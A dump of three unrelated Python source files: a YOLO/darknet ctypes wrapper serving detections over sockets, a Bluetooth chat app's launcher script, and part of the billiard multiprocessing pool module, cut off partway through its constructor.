lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256
QUATO = 100
num_points = 2
wait_time = 0.01
Latency = []
Count = 0
def threading_controller(controller):
global QUATO
global Latency
print ("entered controller threading.", controller)
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data)<=0: break
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
Latency = []
while(len(Latency)<num_points): time.sleep(wait_time)
assert(len(Latency)>=num_points) #make sure there has data in the latency
send_data = np.mean(Latency[1:]) * np.ones(BUFFER_SIZE, dtype=np.double)
#try to send data, if error break
controller.sendall(send_data)
# if controller drop, then close and re-accept
controller.close()
def connect_controller():
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
# start the thread darknet
threads = threading.Thread(target=threading_controller, args=(controller,))
threads.start()
def recv_image_from_socket(client):
buffers = b''
while len(buffers)<4:
try:
buf = client.recv(4-len(buffers))
except:
return False
buffers += buf
size, = struct.unpack('!i', buffers)
#print "receiving %d bytes" % size
recv_data = b''
while len(recv_data) < size:
try:
data = client.recv(1024)
except:
return False
recv_data += data
frame_data = recv_data[:size]
#recv_data = recv_data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def detect(net, meta, image, quato, thresh=.5, hier_thresh=.5, nms=.45):
# GET C,H,W, and DATA values
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, quato)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
calssnamess = meta.names[i].decode('UTF-8')
res.append((calssnamess, dets[j].prob[i], (b.x, b.y, b.w, b.h),classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
if ((x3<=im.shape[0]) and (y3>=0)):
cv2.putText(im, text, (x3,y3), font, 0.5, color, 1,cv2.CV_AA)
else:
cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1,cv2.CV_AA)
cv2.imshow('Detection Window', im)
cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
# detect_net = load_net(b"./cfg/yolov3-tiny.cfg", b"yolov3-tiny.weights", 0)
# detect_net = load_net(b"./cfg/yolov3-416.cfg", b"yolov3.weights", 0)
detect_net = load_net(b"./cfg/yolov3-608.cfg", b"yolov3.weights", 0)
detect_meta = load_meta(b"cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
while True:
client,addr=s.accept()
print ("Get new user socket")
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client)
if decimg is False:
print("client droped, break, waiting other clients")
break
result = detect(detect_net, detect_meta, decimg, QUATO, thresh=0.7)
Latency.append(time.time() - StartTime)
print(str(time.time() - StartTime))
#print(result)
#time.sleep(1)
str1 = '0'+'\n'
client.sendall(str1.encode())
StartTime = time.time()
# if client drop, then close and re-accept
client.close()
|
run.py
|
import logging
import os
import signal
import threading
import sys
import time
from queue import Queue
from src.GUI.gui import MainWindow
from src.bluetooth_node.blue_node import BlueNode
from src.handler.handler import Handler
from src.monitor.monitor import Monitor
from options import Args
def read_key_val_file(name):
"""
Reads a file containing key value pairs separated by an = as dictionary
containing strings.
"""
settings = {}
with open(name, "r") as f:
for line in f:
key, val = line[:-1].split("=")
settings[key] = val
return settings
def setup_dirs():
dirs = ["logs", "data"]
for dir in dirs:
if not os.path.exists(dir):
os.makedirs(dir)
def main():
setup_dirs()
# Create a logger.
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
handlers=[
logging.FileHandler("logs/error.log"),
logging.StreamHandler()
]
)
settings = read_key_val_file("settings.cfg")
logging.debug("sys.argv: {}".format(sys.argv))
if len(sys.argv) == 4:
mac, _, port = sys.argv[Args.simulation].split('+')[0].split('-')
title = mac + " at " + port
settings["baddr"] = mac
else:
title = "A simple chat"
logging.info("Settings: {}".format(settings))
run_monitoring = bool(int(settings["monitoring"]))
if not run_monitoring and bool(int(sys.argv[Args.monitoring])):
run_monitoring = True
# Create queues for data to be send to and read from.
data_queue = Queue()
input_gui_queue = Queue()
output_gui_queue = Queue()
node = BlueNode(settings["server_uuid"], data_queue, settings["baddr"])
window = MainWindow(input_gui_queue, output_gui_queue, title)
handler = Handler(data_queue, input_gui_queue, output_gui_queue, node, settings["baddr"])
# Start first thread for Bluetooth nodes.
thread = threading.Thread(target=node.run, name="BlueNode")
thread.daemon = True
thread.start()
logging.info("Started BlueNode")
# Start second thread for the handler.
handler_thread = threading.Thread(target=handler.run, name="Handler")
handler_thread.daemon = True
handler_thread.start()
logging.info("Starting Handler Queue")
# Oh no...
global monitor
monitor = None
if run_monitoring:
monitor = Monitor(settings["monitoring_ip"], int(settings["monitoring_port"]), settings["baddr"], node)
# Start interface in thread
monitor_thread = threading.Thread(target=monitor.run, name="Monitor")
monitor_thread.daemon = True
monitor_thread.start()
logging.info("Starting GUI")
signal.signal(signal.SIGTERM, close_gracefully)
window.run()
monitor.running = False
def close_gracefully(signal, stacktrace):
global monitor
monitor.running = False
# Give the monitor enough time to write to file.
time.sleep(1)
exit()
if __name__ == "__main__":
print("sys.argv len: {}".format(sys.argv))
if len(sys.argv) < 3:
print(open("failure", "r").read())
else:
main()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import copy
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, mem_rss, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug, warning
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {1}KiB)
"""
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT = 300
GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL = 0.1
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
util.get_logger().error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None, on_ready_counter=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.on_ready_counter = on_ready_counter
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception, self.max_memory_per_child,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit(status)
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
try:
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = mem_rss()
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
warning(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
finally:
# Before exiting the worker, we want to ensure that that all
# messages produced by the worker have been consumed by the main
# process. This prevents the worker being terminated prematurely
# and messages being lost.
self._ensure_messages_consumed(completed=completed)
def _ensure_messages_consumed(self, completed):
""" Returns true if all messages sent out have been received and
consumed within a reasonable amount of time """
if not self.on_ready_counter:
return False
for retry in range(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT):
if self.on_ready_counter.value >= completed:
debug('ensured messages consumed after %d retries', retry)
return True
time.sleep(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL)
warning('could not ensure all messages were consumed prior to '
'exiting')
return False
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGTERM) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGTERM)
else:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGKILL)
else:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Perform a shallow copy before iteration because keys can change.
# A deep copy fails (on shutdown) due to thread.lock objects.
# https://github.com/celery/billiard/issues/260
cache = copy.copy(self.cache)
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in cache.items():
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready, on_ready_counters=None):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self.on_ready_counters = on_ready_counters
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if self.on_ready_counters:
worker_pid = next(iter(item.worker_pids()), None)
if worker_pid and worker_pid in self.on_ready_counters:
on_ready_counter = self.on_ready_counters[worker_pid]
with on_ready_counter.get_lock():
on_ready_counter.value += 1
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
